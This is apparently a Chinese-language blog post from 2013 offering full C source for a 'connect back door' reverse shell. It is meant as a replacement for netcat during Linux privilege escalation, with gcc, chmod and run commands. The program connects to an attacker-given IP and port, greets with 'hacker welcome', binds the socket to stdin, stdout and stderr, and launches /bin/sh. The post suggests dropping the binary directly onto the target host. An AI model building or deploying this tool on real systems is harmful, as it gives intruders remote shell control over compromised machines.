linux nc 反弹不成功 用c脚本替代
作者:admin 发布于:2013-1-8 19:24 Tuesday 分类:Linux
在LINUX下提权的时候 如果主机上的NC不可用,则可用如下的代码 于反弹用一个SHELL来交互使用 用法如下
gcc -o shell shell.c
chmod 777 shell
./shell ip port
就可以了
当然本机应该先监听一个端口
当然也可以把可执行文件直接扔到主机上执行
[c]
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
void usage();
char shell[]=”/bin/sh”;
char message[]=”hacker welcomen”;
int sock;
int main(int argc, char *argv[]) {
if(argc <3){
usage(argv[0]);
}
struct sockaddr_in server;
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf(“Couldn’t make socket!n”); exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(atoi(argv[2]));
server.sin_addr.s_addr = inet_addr(argv[1]);
if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {
printf(“Could not connect to remote shell!n”);
exit(-1);
}
send(sock, message, sizeof(message), 0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl(shell,”/bin/sh”,(char *)0);
close(sock);
return 1;
}
void usage(char *prog[]) {
printf(“tts8s8 connect back doornn”);
printf(“t sql@s8s8.netnn”);
printf(“Usage: %s <reflect ip> <port>n”, prog);
exit(-1);
}
[/c]